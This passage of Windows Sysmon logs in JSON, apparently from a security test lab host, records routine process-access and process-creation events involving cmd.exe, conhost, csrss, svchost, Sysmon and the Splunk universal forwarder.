{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3934,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.216\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-001016B50500}\r\nTargetProcessId: 4832\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.216","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-001016B50500}","TargetProcessId":"4832","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3935,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.327\r\nProcessGuid: {E2A3D6B1-1107-5F25-0000-0010D5B60500}\r\nProcessId: 5032\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinNetMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.327","ProcessGuid":"{E2A3D6B1-1107-5F25-0000-0010D5B60500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinNetMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3936,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.326\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 4372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-00109A5A0500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.326","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"4372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00109A5A0500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3937,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.326\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-00109A5A0500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.326","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00109A5A0500}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3938,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3939,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3940,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3941,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3942,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 